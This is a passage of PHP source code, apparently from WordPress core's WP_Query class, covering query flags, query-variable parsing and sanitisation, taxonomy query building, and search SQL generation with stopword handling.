trackback endpoint call. * * @since 1.5.0 * @var bool */ public $is_trackback = false; /** * Signifies whether the current query is for the site homepage. * * @since 1.5.0 * @var bool */ public $is_home = false; /** * Signifies whether the current query is for the Privacy Policy page. * * @since 5.2.0 * @var bool */ public $is_privacy_policy = false; /** * Signifies whether the current query couldn't find anything. * * @since 1.5.0 * @var bool */ public $is_404 = false; /** * Signifies whether the current query is for an embed. * * @since 4.4.0 * @var bool */ public $is_embed = false; /** * Signifies whether the current query is for a paged result and not for the first page. * * @since 1.5.0 * @var bool */ public $is_paged = false; /** * Signifies whether the current query is for an administrative interface page. * * @since 1.5.0 * @var bool */ public $is_admin = false; /** * Signifies whether the current query is for an attachment page. * * @since 2.0.0 * @var bool */ public $is_attachment = false; /** * Signifies whether the current query is for an existing single post of any post type * (post, attachment, page, custom post types). * * @since 2.1.0 * @var bool */ public $is_singular = false; /** * Signifies whether the current query is for the robots.txt file. * * @since 2.1.0 * @var bool */ public $is_robots = false; /** * Signifies whether the current query is for the page_for_posts page. * * Basically, the homepage if the option isn't set for the static homepage. * * @since 2.1.0 * @var bool */ public $is_posts_page = false; /** * Signifies whether the current query is for a post type archive. * * @since 3.1.0 * @var bool */ public $is_post_type_archive = false; /** * Stores the ->query_vars state like md5(serialize( $this->query_vars ) ) so we know * whether we have to re-parse because something has changed * * @since 3.1.0 * @var bool|string */ private $query_vars_hash = false; /** * Whether query vars have changed since the initial parse_query() call. Used to catch modifications to query vars made * via pre_get_posts hooks. * * @since 3.1.1 */ private $query_vars_changed = true; /** * Set if post thumbnails are cached * * @since 3.2.0 * @var bool */ public $thumbnails_cached = false; /** * Controls whether an attachment query should include filenames or not. * * @since 6.0.3 * @var bool */ protected $allow_query_attachment_by_filename = false; /** * Cached list of search stopwords. * * @since 3.7.0 * @var array */ private $stopwords; private $compat_fields = array( 'query_vars_hash', 'query_vars_changed' ); private $compat_methods = array( 'init_query_flags', 'parse_tax_query' ); /** * Resets query flags to false. * * The query flags are what page info WordPress was able to figure out. * * @since 2.0.0 */ private function init_query_flags() { $this->is_single = false; $this->is_preview = false; $this->is_page = false; $this->is_archive = false; $this->is_date = false; $this->is_year = false; $this->is_month = false; $this->is_day = false; $this->is_time = false; $this->is_author = false; $this->is_category = false; $this->is_tag = false; $this->is_tax = false; $this->is_search = false; $this->is_feed = false; $this->is_comment_feed = false; $this->is_trackback = false; $this->is_home = false; $this->is_privacy_policy = false; $this->is_404 = false; $this->is_paged = false; $this->is_admin = false; $this->is_attachment = false; $this->is_singular = false; $this->is_robots = false; $this->is_posts_page = false; $this->is_post_type_archive = false; } /** * Initiates object properties and sets default values. * * @since 1.5.0 */ public function init() { unset( $this->posts ); unset( $this->query ); $this->query_vars = array(); unset( $this->queried_object ); unset( $this->queried_object_id ); $this->post_count = 0; $this->current_post = -1; $this->in_the_loop = false; unset( $this->request ); unset( $this->post ); unset( $this->comments ); unset( $this->comment ); $this->comment_count = 0; $this->current_comment = -1; $this->found_posts = 0; $this->max_num_pages = 0; $this->max_num_comment_pages = 0; $this->init_query_flags(); } /** * Reparse the query vars. * * @since 1.5.0 */ public function parse_query_vars() { $this->parse_query(); } /** * Fills in the query variables, which do not exist within the parameter. * * @since 2.1.0 * @since 4.4.0 Removed the `comments_popup` public query variable. * * @param array $array Defined query variables. * @return array Complete query variables with undefined ones filled in empty. */ public function fill_query_vars( $array ) { $keys = array( 'error', 'm', 'p', 'post_parent', 'subpost', 'subpost_id', 'attachment', 'attachment_id', 'name', 'pagename', 'page_id', 'second', 'minute', 'hour', 'day', 'monthnum', 'year', 'w', 'category_name', 'tag', 'cat', 'tag_id', 'author', 'author_name', 'feed', 'tb', 'paged', 'meta_key', 'meta_value', 'preview', 's', 'sentence', 'title', 'fields', 'menu_order', 'embed', ); foreach ( $keys as $key ) { if ( ! isset( $array[ $key ] ) ) { $array[ $key ] = ''; } } $array_keys = array( 'category__in', 'category__not_in', 'category__and', 'post__in', 'post__not_in', 'post_name__in', 'tag__in', 'tag__not_in', 'tag__and', 'tag_slug__in', 'tag_slug__and', 'post_parent__in', 'post_parent__not_in', 'author__in', 'author__not_in', ); foreach ( $array_keys as $key ) { if ( ! isset( $array[ $key ] ) ) { $array[ $key ] = array(); } } return $array; } /** * Parse a query string and set query type booleans. * * @since 1.5.0 * @since 4.2.0 Introduced the ability to order by specific clauses of a `$meta_query`, by passing the clause's * array key to `$orderby`. * @since 4.4.0 Introduced `$post_name__in` and `$title` parameters. `$s` was updated to support excluded * search terms, by prepending a hyphen. * @since 4.5.0 Removed the `$comments_popup` parameter. * Introduced the `$comment_status` and `$ping_status` parameters. * Introduced `RAND(x)` syntax for `$orderby`, which allows an integer seed value to random sorts. * @since 4.6.0 Added 'post_name__in' support for `$orderby`. Introduced the `$lazy_load_term_meta` argument. * @since 4.9.0 Introduced the `$comment_count` parameter. * @since 5.1.0 Introduced the `$meta_compare_key` parameter. * * @param string|array $query { * Optional. Array or string of Query parameters. * * @type int $attachment_id Attachment post ID. Used for 'attachment' post_type. * @type int|string $author Author ID, or comma-separated list of IDs. * @type string $author_name User 'user_nicename'. * @type array $author__in An array of author IDs to query from. * @type array $author__not_in An array of author IDs not to query from. * @type bool $cache_results Whether to cache post information. Default true. * @type int|string $cat Category ID or comma-separated list of IDs (this or any children). * @type array $category__and An array of category IDs (AND in). * @type array $category__in An array of category IDs (OR in, no children). * @type array $category__not_in An array of category IDs (NOT in). * @type string $category_name Use category slug (not name, this or any children). * @type array|int $comment_count Filter results by comment count. Provide an integer to match * comment count exactly. Provide an array with integer 'value' * and 'compare' operator ('=', '!=', '>', '>=', '<', '<=' ) to * compare against comment_count in a specific way. * @type string $comment_status Comment status. * @type int $comments_per_page The number of comments to return per page. * Default 'comments_per_page' option. * @type array $date_query An associative array of WP_Date_Query arguments. * See WP_Date_Query::__construct(). * @type int $day Day of the month. Default empty. Accepts numbers 1-31. * @type bool $exact Whether to search by exact keyword. Default false. * @type string|array $fields Which fields to return. Single field or all fields (string), * or array of fields. 'id=>parent' uses 'id' and 'post_parent'. * Default all fields. Accepts 'ids', 'id=>parent'. * @type int $hour Hour of the day. Default empty. Accepts numbers 0-23. * @type int|bool $ignore_sticky_posts Whether to ignore sticky posts or not. Setting this to false * excludes stickies from 'post__in'. Accepts 1|true, 0|false. * Default 0|false. * @type int $m Combination YearMonth. Accepts any four-digit year and month * numbers 1-12. Default empty. * @type string $meta_compare Comparison operator to test the 'meta_value'. * @type string $meta_compare_key Comparison operator to test the 'meta_key'. * @type string $meta_key Custom field key. * @type array $meta_query An associative array of WP_Meta_Query arguments. See WP_Meta_Query. * @type string $meta_value Custom field value. * @type int $meta_value_num Custom field value number. * @type int $menu_order The menu order of the posts. * @type int $monthnum The two-digit month. Default empty. Accepts numbers 1-12. * @type string $name Post slug. * @type bool $nopaging Show all posts (true) or paginate (false). Default false. * @type bool $no_found_rows Whether to skip counting the total rows found. Enabling can improve * performance. Default false. * @type int $offset The number of posts to offset before retrieval. * @type string $order Designates ascending or descending order of posts. Default 'DESC'. * Accepts 'ASC', 'DESC'. * @type string|array $orderby Sort retrieved posts by parameter. One or more options may be * passed. To use 'meta_value', or 'meta_value_num', * 'meta_key=keyname' must be also be defined. To sort by a * specific `$meta_query` clause, use that clause's array key. * Accepts 'none', 'name', 'author', 'date', 'title', * 'modified', 'menu_order', 'parent', 'ID', 'rand', * 'relevance', 'RAND(x)' (where 'x' is an integer seed value), * 'comment_count', 'meta_value', 'meta_value_num', 'post__in', * 'post_name__in', 'post_parent__in', and the array keys * of `$meta_query`. Default is 'date', except when a search * is being performed, when the default is 'relevance'. * * @type int $p Post ID. * @type int $page Show the number of posts that would show up on page X of a * static front page. * @type int $paged The number of the current page. * @type int $page_id Page ID. * @type string $pagename Page slug. * @type string $perm Show posts if user has the appropriate capability. * @type string $ping_status Ping status. * @type array $post__in An array of post IDs to retrieve, sticky posts will be included * @type string $post_mime_type The mime type of the post. Used for 'attachment' post_type. * @type array $post__not_in An array of post IDs not to retrieve. Note: a string of comma- * separated IDs will NOT work. * @type int $post_parent Page ID to retrieve child pages for. Use 0 to only retrieve * top-level pages. * @type array $post_parent__in An array containing parent page IDs to query child pages from. * @type array $post_parent__not_in An array containing parent page IDs not to query child pages from. * @type string|array $post_type A post type slug (string) or array of post type slugs. * Default 'any' if using 'tax_query'. * @type string|array $post_status A post status (string) or array of post statuses. * @type int $posts_per_page The number of posts to query for. Use -1 to request all posts. * @type int $posts_per_archive_page The number of posts to query for by archive page. Overrides * 'posts_per_page' when is_archive(), or is_search() are true. * @type array $post_name__in An array of post slugs that results must match. * @type string $s Search keyword(s). Prepending a term with a hyphen will * exclude posts matching that term. Eg, 'pillow -sofa' will * return posts containing 'pillow' but not 'sofa'. The * character used for exclusion can be modified using the * the 'wp_query_search_exclusion_prefix' filter. * @type int $second Second of the minute. Default empty. Accepts numbers 0-60. * @type bool $sentence Whether to search by phrase. Default false. * @type bool $suppress_filters Whether to suppress filters. Default false. * @type string $tag Tag slug. Comma-separated (either), Plus-separated (all). * @type array $tag__and An array of tag ids (AND in). * @type array $tag__in An array of tag ids (OR in). * @type array $tag__not_in An array of tag ids (NOT in). * @type int $tag_id Tag id or comma-separated list of IDs. * @type array $tag_slug__and An array of tag slugs (AND in). * @type array $tag_slug__in An array of tag slugs (OR in). unless 'ignore_sticky_posts' is * true. Note: a string of comma-separated IDs will NOT work. * @type array $tax_query An associative array of WP_Tax_Query arguments. * See WP_Tax_Query->queries. * @type string $title Post title. * @type bool $update_post_meta_cache Whether to update the post meta cache. Default true. * @type bool $update_post_term_cache Whether to update the post term cache. Default true. * @type bool $lazy_load_term_meta Whether to lazy-load term meta. Setting to false will * disable cache priming for term meta, so that each * get_term_meta() call will hit the database. * Defaults to the value of `$update_post_term_cache`. * @type int $w The week number of the year. Default empty. Accepts numbers 0-53. * @type int $year The four-digit year. Default empty. Accepts any four-digit year. * } */ public function parse_query( $query = '' ) { if ( ! empty( $query ) ) { $this->init(); $this->query = $this->query_vars = wp_parse_args( $query ); } elseif ( ! isset( $this->query ) ) { $this->query = $this->query_vars; } $this->query_vars = $this->fill_query_vars( $this->query_vars ); $qv = &$this->query_vars; $this->query_vars_changed = true; if ( ! empty( $qv['robots'] ) ) { $this->is_robots = true; } if ( ! is_scalar( $qv['p'] ) || $qv['p'] < 0 ) { $qv['p'] = 0; $qv['error'] = '404'; } else { $qv['p'] = intval( $qv['p'] ); } $qv['page_id'] = absint( $qv['page_id'] ); $qv['year'] = absint( $qv['year'] ); $qv['monthnum'] = absint( $qv['monthnum'] ); $qv['day'] = absint( $qv['day'] ); $qv['w'] = absint( $qv['w'] ); $qv['m'] = is_scalar( $qv['m'] ) ? preg_replace( '|[^0-9]|', '', $qv['m'] ) : ''; $qv['paged'] = absint( $qv['paged'] ); $qv['cat'] = preg_replace( '|[^0-9,-]|', '', $qv['cat'] ); // comma separated list of positive or negative integers $qv['author'] = preg_replace( '|[^0-9,-]|', '', $qv['author'] ); // comma separated list of positive or negative integers $qv['pagename'] = trim( $qv['pagename'] ); $qv['name'] = trim( $qv['name'] ); $qv['title'] = trim( $qv['title'] ); if ( '' !== $qv['hour'] ) { $qv['hour'] = absint( $qv['hour'] ); } if ( '' !== $qv['minute'] ) { $qv['minute'] = absint( $qv['minute'] ); } if ( '' !== $qv['second'] ) { $qv['second'] = absint( $qv['second'] ); } if ( '' !== $qv['menu_order'] ) { $qv['menu_order'] = absint( $qv['menu_order'] ); } // Fairly insane upper bound for search string lengths. if ( ! is_scalar( $qv['s'] ) || ( ! empty( $qv['s'] ) && strlen( $qv['s'] ) > 1600 ) ) { $qv['s'] = ''; } // Compat. Map subpost to attachment. if ( '' != $qv['subpost'] ) { $qv['attachment'] = $qv['subpost']; } if ( '' != $qv['subpost_id'] ) { $qv['attachment_id'] = $qv['subpost_id']; } $qv['attachment_id'] = absint( $qv['attachment_id'] ); if ( ( '' != $qv['attachment'] ) || ! empty( $qv['attachment_id'] ) ) { $this->is_single = true; $this->is_attachment = true; } elseif ( '' != $qv['name'] ) { $this->is_single = true; } elseif ( $qv['p'] ) { $this->is_single = true; } elseif ( '' != $qv['pagename'] || ! empty( $qv['page_id'] ) ) { $this->is_page = true; $this->is_single = false; } else { // Look for archive queries. Dates, categories, authors, search, post type archives. if ( isset( $this->query['s'] ) ) { $this->is_search = true; } if ( '' !== $qv['second'] ) { $this->is_time = true; $this->is_date = true; } if ( '' !== $qv['minute'] ) { $this->is_time = true; $this->is_date = true; } if ( '' !== $qv['hour'] ) { $this->is_time = true; $this->is_date = true; } if ( $qv['day'] ) { if ( ! $this->is_date ) { $date = sprintf( '%04d-%02d-%02d', $qv['year'], $qv['monthnum'], $qv['day'] ); if ( $qv['monthnum'] && $qv['year'] && ! wp_checkdate( $qv['monthnum'], $qv['day'], $qv['year'], $date ) ) { $qv['error'] = '404'; } else { $this->is_day = true; $this->is_date = true; } } } if ( $qv['monthnum'] ) { if ( ! $this->is_date ) { if ( 12 < $qv['monthnum'] ) { $qv['error'] = '404'; } else { $this->is_month = true; $this->is_date = true; } } } if ( $qv['year'] ) { if ( ! $this->is_date ) { $this->is_year = true; $this->is_date = true; } } if ( $qv['m'] ) { $this->is_date = true; if ( strlen( $qv['m'] ) > 9 ) { $this->is_time = true; } elseif ( strlen( $qv['m'] ) > 7 ) { $this->is_day = true; } elseif ( strlen( $qv['m'] ) > 5 ) { $this->is_month = true; } else { $this->is_year = true; } } if ( '' != $qv['w'] ) { $this->is_date = true; } $this->query_vars_hash = false; $this->parse_tax_query( $qv ); foreach ( $this->tax_query->queries as $tax_query ) { if ( ! is_array( $tax_query ) ) { continue; } if ( isset( $tax_query['operator'] ) && 'NOT IN' != $tax_query['operator'] ) { switch ( $tax_query['taxonomy'] ) { case 'category': $this->is_category = true; break; case 'post_tag': $this->is_tag = true; break; default: $this->is_tax = true; } } } unset( $tax_query ); if ( empty( $qv['author'] ) || ( $qv['author'] == '0' ) ) { $this->is_author = false; } else { $this->is_author = true; } if ( '' != $qv['author_name'] ) { $this->is_author = true; } if ( ! empty( $qv['post_type'] ) && ! is_array( $qv['post_type'] ) ) { $post_type_obj = get_post_type_object( $qv['post_type'] ); if ( ! empty( $post_type_obj->has_archive ) ) { $this->is_post_type_archive = true; } } if ( $this->is_post_type_archive || $this->is_date || $this->is_author || $this->is_category || $this->is_tag || $this->is_tax ) { $this->is_archive = true; } } if ( '' != $qv['feed'] ) { $this->is_feed = true; } if ( '' != $qv['embed'] ) { $this->is_embed = true; } if ( '' != $qv['tb'] ) { $this->is_trackback = true; } if ( '' != $qv['paged'] && ( intval( $qv['paged'] ) > 1 ) ) { $this->is_paged = true; } // if we're previewing inside the write screen if ( '' != $qv['preview'] ) { $this->is_preview = true; } if ( is_admin() ) { $this->is_admin = true; } if ( false !== strpos( $qv['feed'], 'comments-' ) ) { $qv['feed'] = str_replace( 'comments-', '', $qv['feed'] ); $qv['withcomments'] = 1; } $this->is_singular = $this->is_single || $this->is_page || $this->is_attachment; if ( $this->is_feed && ( ! empty( $qv['withcomments'] ) || ( empty( $qv['withoutcomments'] ) && $this->is_singular ) ) ) { $this->is_comment_feed = true; } if ( ! ( $this->is_singular || $this->is_archive || $this->is_search || $this->is_feed || ( defined( 'REST_REQUEST' ) && REST_REQUEST ) || $this->is_trackback || $this->is_404 || $this->is_admin || $this->is_robots ) ) { $this->is_home = true; } // Correct is_* for page_on_front and page_for_posts if ( $this->is_home && 'page' == get_option( 'show_on_front' ) && get_option( 'page_on_front' ) ) { $_query = wp_parse_args( $this->query ); // pagename can be set and empty depending on matched rewrite rules. Ignore an empty pagename. if ( isset( $_query['pagename'] ) && '' == $_query['pagename'] ) { unset( $_query['pagename'] ); } unset( $_query['embed'] ); if ( empty( $_query ) || ! array_diff( array_keys( $_query ), array( 'preview', 'page', 'paged', 'cpage' ) ) ) { $this->is_page = true; $this->is_home = false; $qv['page_id'] = get_option( 'page_on_front' ); // Correct for page_on_front if ( ! empty( $qv['paged'] ) ) { $qv['page'] = $qv['paged']; unset( $qv['paged'] ); } } } if ( '' != $qv['pagename'] ) { $this->queried_object = get_page_by_path( $qv['pagename'] ); if ( $this->queried_object && 'attachment' == $this->queried_object->post_type ) { if ( preg_match( '/^[^%]*%(?:postname)%/', get_option( 'permalink_structure' ) ) ) { // See if we also have a post with the same slug $post = get_page_by_path( $qv['pagename'], OBJECT, 'post' ); if ( $post ) { $this->queried_object = $post; $this->is_page = false; $this->is_single = true; } } } if ( ! empty( $this->queried_object ) ) { $this->queried_object_id = (int) $this->queried_object->ID; } else { unset( $this->queried_object ); } if ( 'page' == get_option( 'show_on_front' ) && isset( $this->queried_object_id ) && $this->queried_object_id == get_option( 'page_for_posts' ) ) { $this->is_page = false; $this->is_home = true; $this->is_posts_page = true; } if ( isset( $this->queried_object_id ) && $this->queried_object_id == get_option( 'wp_page_for_privacy_policy' ) ) { $this->is_privacy_policy = true; } } if ( $qv['page_id'] ) { if ( 'page' == get_option( 'show_on_front' ) && $qv['page_id'] == get_option( 'page_for_posts' ) ) { $this->is_page = false; $this->is_home = true; $this->is_posts_page = true; } if ( $qv['page_id'] == get_option( 'wp_page_for_privacy_policy' ) ) { $this->is_privacy_policy = true; } } if ( ! empty( $qv['post_type'] ) ) { if ( is_array( $qv['post_type'] ) ) { $qv['post_type'] = array_map( 'sanitize_key', $qv['post_type'] ); } else { $qv['post_type'] = sanitize_key( $qv['post_type'] ); } } if ( ! empty( $qv['post_status'] ) ) { if ( is_array( $qv['post_status'] ) ) { $qv['post_status'] = array_map( 'sanitize_key', $qv['post_status'] ); } else { $qv['post_status'] = preg_replace( '|[^a-z0-9_,-]|', '', $qv['post_status'] ); } } if ( $this->is_posts_page && ( ! isset( $qv['withcomments'] ) || ! $qv['withcomments'] ) ) { $this->is_comment_feed = false; } $this->is_singular = $this->is_single || $this->is_page || $this->is_attachment; // Done correcting is_* for page_on_front and page_for_posts if ( '404' == $qv['error'] ) { $this->set_404(); } $this->is_embed = $this->is_embed && ( $this->is_singular || $this->is_404 ); $this->query_vars_hash = md5( serialize( $this->query_vars ) ); $this->query_vars_changed = false; /** * Fires after the main query vars have been parsed. * * @since 1.5.0 * * @param WP_Query $this The WP_Query instance (passed by reference). */ do_action_ref_array( 'parse_query', array( &$this ) ); } /** * Parses various taxonomy related query vars. * * For BC, this method is not marked as protected. See [28987]. * * @since 3.1.0 * * @param array $q The query variables. Passed by reference. */ public function parse_tax_query( &$q ) { if ( ! empty( $q['tax_query'] ) && is_array( $q['tax_query'] ) ) { $tax_query = $q['tax_query']; } else { $tax_query = array(); } if ( ! empty( $q['taxonomy'] ) && ! empty( $q['term'] ) ) { $tax_query[] = array( 'taxonomy' => $q['taxonomy'], 'terms' => array( $q['term'] ), 'field' => 'slug', ); } foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) { if ( 'post_tag' == $taxonomy ) { continue; // Handled further down in the $q['tag'] block } if ( $t->query_var && ! empty( $q[ $t->query_var ] ) ) { $tax_query_defaults = array( 'taxonomy' => $taxonomy, 'field' => 'slug', ); if ( isset( $t->rewrite['hierarchical'] ) && $t->rewrite['hierarchical'] ) { $q[ $t->query_var ] = wp_basename( $q[ $t->query_var ] ); } $term = $q[ $t->query_var ]; if ( is_array( $term ) ) { $term = implode( ',', $term ); } if ( strpos( $term, '+' ) !== false ) { $terms = preg_split( '/[+]+/', $term ); foreach ( $terms as $term ) { $tax_query[] = array_merge( $tax_query_defaults, array( 'terms' => array( $term ), ) ); } } else { $tax_query[] = array_merge( $tax_query_defaults, array( 'terms' => preg_split( '/[,]+/', $term ), ) ); } } } // If querystring 'cat' is an array, implode it. if ( is_array( $q['cat'] ) ) { $q['cat'] = implode( ',', $q['cat'] ); } // Category stuff if ( ! empty( $q['cat'] ) && ! $this->is_singular ) { $cat_in = $cat_not_in = array(); $cat_array = preg_split( '/[,\s]+/', urldecode( $q['cat'] ) ); $cat_array = array_map( 'intval', $cat_array ); $q['cat'] = implode( ',', $cat_array ); foreach ( $cat_array as $cat ) { if ( $cat > 0 ) { $cat_in[] = $cat; } elseif ( $cat < 0 ) { $cat_not_in[] = abs( $cat ); } } if ( ! empty( $cat_in ) ) { $tax_query[] = array( 'taxonomy' => 'category', 'terms' => $cat_in, 'field' => 'term_id', 'include_children' => true, ); } if ( ! empty( $cat_not_in ) ) { $tax_query[] = array( 'taxonomy' => 'category', 'terms' => $cat_not_in, 'field' => 'term_id', 'operator' => 'NOT IN', 'include_children' => true, ); } unset( $cat_array, $cat_in, $cat_not_in ); } if ( ! empty( $q['category__and'] ) && 1 === count( (array) $q['category__and'] ) ) { $q['category__and'] = (array) $q['category__and']; if ( ! isset( $q['category__in'] ) ) { $q['category__in'] = array(); } $q['category__in'][] = absint( reset( $q['category__and'] ) ); unset( $q['category__and'] ); } if ( ! empty( $q['category__in'] ) ) { $q['category__in'] = array_map( 'absint', array_unique( (array) $q['category__in'] ) ); $tax_query[] = array( 'taxonomy' => 'category', 'terms' => $q['category__in'], 'field' => 'term_id', 'include_children' => false, ); } if ( ! empty( $q['category__not_in'] ) ) { $q['category__not_in'] = array_map( 'absint', array_unique( (array) $q['category__not_in'] ) ); $tax_query[] = array( 'taxonomy' => 'category', 'terms' => $q['category__not_in'], 'operator' => 'NOT IN', 'include_children' => false, ); } if ( ! empty( $q['category__and'] ) ) { $q['category__and'] = array_map( 'absint', array_unique( (array) $q['category__and'] ) ); $tax_query[] = array( 'taxonomy' => 'category', 'terms' => $q['category__and'], 'field' => 'term_id', 'operator' => 'AND', 'include_children' => false, ); } // If querystring 'tag' is array, implode it. if ( is_array( $q['tag'] ) ) { $q['tag'] = implode( ',', $q['tag'] ); } // Tag stuff if ( '' != $q['tag'] && ! $this->is_singular && $this->query_vars_changed ) { if ( strpos( $q['tag'], ',' ) !== false ) { $tags = preg_split( '/[,\r\n\t ]+/', $q['tag'] ); foreach ( (array) $tags as $tag ) { $tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' ); $q['tag_slug__in'][] = $tag; } } elseif ( preg_match( '/[+\r\n\t ]+/', $q['tag'] ) || ! empty( $q['cat'] ) ) { $tags = preg_split( '/[+\r\n\t ]+/', $q['tag'] ); foreach ( (array) $tags as $tag ) { $tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' ); $q['tag_slug__and'][] = $tag; } } else { $q['tag'] = sanitize_term_field( 'slug', $q['tag'], 0, 'post_tag', 'db' ); $q['tag_slug__in'][] = $q['tag']; } } if ( ! empty( $q['tag_id'] ) ) { $q['tag_id'] = absint( $q['tag_id'] ); $tax_query[] = array( 'taxonomy' => 'post_tag', 'terms' => $q['tag_id'], ); } if ( ! empty( $q['tag__in'] ) ) { $q['tag__in'] = array_map( 'absint', array_unique( (array) $q['tag__in'] ) ); $tax_query[] = array( 'taxonomy' => 'post_tag', 'terms' => $q['tag__in'], ); } if ( ! empty( $q['tag__not_in'] ) ) { $q['tag__not_in'] = array_map( 'absint', array_unique( (array) $q['tag__not_in'] ) ); $tax_query[] = array( 'taxonomy' => 'post_tag', 'terms' => $q['tag__not_in'], 'operator' => 'NOT IN', ); } if ( ! empty( $q['tag__and'] ) ) { $q['tag__and'] = array_map( 'absint', array_unique( (array) $q['tag__and'] ) ); $tax_query[] = array( 'taxonomy' => 'post_tag', 'terms' => $q['tag__and'], 'operator' => 'AND', ); } if ( ! empty( $q['tag_slug__in'] ) ) { $q['tag_slug__in'] = array_map( 'sanitize_title_for_query', array_unique( (array) $q['tag_slug__in'] ) ); $tax_query[] = array( 'taxonomy' => 'post_tag', 'terms' => $q['tag_slug__in'], 'field' => 'slug', ); } if ( ! empty( $q['tag_slug__and'] ) ) { $q['tag_slug__and'] = array_map( 'sanitize_title_for_query', array_unique( (array) $q['tag_slug__and'] ) ); $tax_query[] = array( 'taxonomy' => 'post_tag', 'terms' => $q['tag_slug__and'], 'field' => 'slug', 'operator' => 'AND', ); } $this->tax_query = new WP_Tax_Query( $tax_query ); /** * Fires after taxonomy-related query vars have been parsed. * * @since 3.7.0 * * @param WP_Query $this The WP_Query instance. */ do_action( 'parse_tax_query', $this ); } /** * Generates SQL for the WHERE clause based on passed search terms. * * @since 3.7.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param array $q Query variables. * @return string WHERE clause. */ protected function parse_search( &$q ) { global $wpdb; $search = ''; // added slashes screw with quote grouping when done early, so done later $q['s'] = stripslashes( $q['s'] ); if ( empty( $_GET['s'] ) && $this->is_main_query() ) { $q['s'] = urldecode( $q['s'] ); } // there are no line breaks in fields $q['s'] = str_replace( array( "\r", "\n" ), '', $q['s'] ); $q['search_terms_count'] = 1; if ( ! empty( $q['sentence'] ) ) { $q['search_terms'] = array( $q['s'] ); } else { if ( preg_match_all( '/".*?("|$)|((?<=[\t ",+])|^)[^\t ",+]+/', $q['s'], $matches ) ) { $q['search_terms_count'] = count( $matches[0] ); $q['search_terms'] = $this->parse_search_terms( $matches[0] ); // if the search string has only short terms or stopwords, or is 10+ terms long, match it as sentence if ( empty( $q['search_terms'] ) || count( $q['search_terms'] ) > 9 ) { $q['search_terms'] = array( $q['s'] ); } } else { $q['search_terms'] = array( $q['s'] ); } } $n = ! empty( $q['exact'] ) ? '' : '%'; $searchand = ''; $q['search_orderby_title'] = array(); /** * Filters the prefix that indicates that a search term should be excluded from results. * * @since 4.7.0 * * @param string $exclusion_prefix The prefix. Default '-'. Returning * an empty value disables exclusions. */ $exclusion_prefix = apply_filters( 'wp_query_search_exclusion_prefix', '-' ); foreach ( $q['search_terms'] as $term ) { // If there is an $exclusion_prefix, terms prefixed with it should be excluded. $exclude = $exclusion_prefix && ( $exclusion_prefix === substr( $term, 0, 1 ) ); if ( $exclude ) { $like_op = 'NOT LIKE'; $andor_op = 'AND'; $term = substr( $term, 1 ); } else { $like_op = 'LIKE'; $andor_op = 'OR'; } if ( $n && ! $exclude ) { $like = '%' . $wpdb->esc_like( $term ) . '%'; $q['search_orderby_title'][] = $wpdb->prepare( "{$wpdb->posts}.post_title LIKE %s", $like ); } $like = $n . $wpdb->esc_like( $term ) . $n; if ( ! empty( $this->allow_query_attachment_by_filename ) ) { $search .= $wpdb->prepare( "{$searchand}(({$wpdb->posts}.post_title $like_op %s) $andor_op ({$wpdb->posts}.post_excerpt $like_op %s) $andor_op ({$wpdb->posts}.post_content $like_op %s) $andor_op (sq1.meta_value $like_op %s))", $like, $like, $like, $like ); } else { $search .= $wpdb->prepare( "{$searchand}(({$wpdb->posts}.post_title $like_op %s) $andor_op ({$wpdb->posts}.post_excerpt $like_op %s) $andor_op ({$wpdb->posts}.post_content $like_op %s))", $like, $like, $like ); } $searchand = ' AND '; } if ( ! empty( $search ) ) { $search = " AND ({$search}) "; if ( ! is_user_logged_in() ) { $search .= " AND ({$wpdb->posts}.post_password = '') "; } } return $search; } /** * Check if the terms are suitable for searching. * * Uses an array of stopwords (terms) that are excluded from the separate * term matching when searching for posts. The list of English stopwords is * the approximate search engines list, and is translatable. * * @since 3.7.0 * * @param string[] $terms Array of terms to check. * @return array Terms that are not stopwords. */ protected function parse_search_terms( $terms ) { $strtolower = function_exists( 'mb_strtolower' ) ? 'mb_strtolower' : 'strtolower'; $checked = array(); $stopwords = $this->get_search_stopwords(); foreach ( $terms as $term ) { // keep before/after spaces when term is for exact match if ( preg_match( '/^".+"$/', $term ) ) { $term = trim( $term, "\"'" ); } else { $term = trim( $term, "\"' " ); } // Avoid single A-Z and single dashes. if ( ! $term || ( 1 === strlen( $term ) && preg_match( '/^[a-z\-]$/i', $term ) ) ) { continue; } if ( in_array( call_user_func( $strtolower, $term ), $stopwords, true ) ) { continue; } $checked[] = $term; } return $checked; } /** * Retrieve stopwords used when parsing search terms. * * @since 3.7.0 * * @return array Stopwords. */ protected function get_search_stopwords() { if ( isset( $this->stopwords ) ) { return $this->stopwords; } /* translators: This is a comma-separated list of very common words that should be excluded from a search, * like a, an, and the. These are usually called "stopwords". You should not simply translate these individual * words into your language. Instead, look for and provide commonly accepted stopwords in your language. */ $words = explode( ',', _x( 'about,an,are,as,at,be,by,com,for,from,how,in,is,it,of,on,or,that,the,this,to,was,what,when,where,who,will,with,www', 'Comma-separated list of search stopwords in your language' ) ); $stopwords = array(); foreach ( $words as $word ) { $word = trim( $word, "\r\n\t " ); if ( $word ) { $stopwords[] = $word; } } /** * Filters stopwords used when parsing search terms. * * @since 3.7.0 * * @param string[] $stopwords Array of stopwords. */ $this->stopwords = apply_filters( 'wp_search_stopwords', $stopwords ); return $this->stopwords; } /** * Generates SQL for the ORDER BY condition based on passed search terms. * * @since 3.7.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param array $q Query variables. * @return string ORDER BY clause. */ protected function parse_search_order( &$q ) { global $wpdb; if ( $q['search_terms_count'] > 1 ) { $num_terms = count( $q['search_orderby_title'] ); // If the search terms contain negative queries, don't bother ordering by sentence matches. $like = ''; if ( ! preg_match( '/(?:\s|^)\-/', $q['s'] ) ) { $like = '%' . $wpdb->esc_like( $q['s'] ) . '%'; } $search_orderby = ''; // sentence match in 'post_title' if ( $like ) { $search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_title LIKE %s THEN 1 ", $like ); } // sanity limit, sort as sentence when more than 6 terms // (few searches are longer than 6 terms and most titles are not) if ( $num_terms < 7 ) { // all words in title $search_orderby .= 'WHEN ' . implode( ' AND ', $q['search_orderby_title'] ) . ' THEN 2 '; // any word in title, not needed when $num_terms == 1 if ( $num_terms > 1 ) { $search_orderby .= 'WHEN ' . implode( ' OR ', $q['search_orderby_title'] ) . ' THEN 3 '; } } // Sentence match in 'post_content' and 'post_excerpt'. if ( $like ) { $search_orderby .= $wpdb->prepare( "WHEN 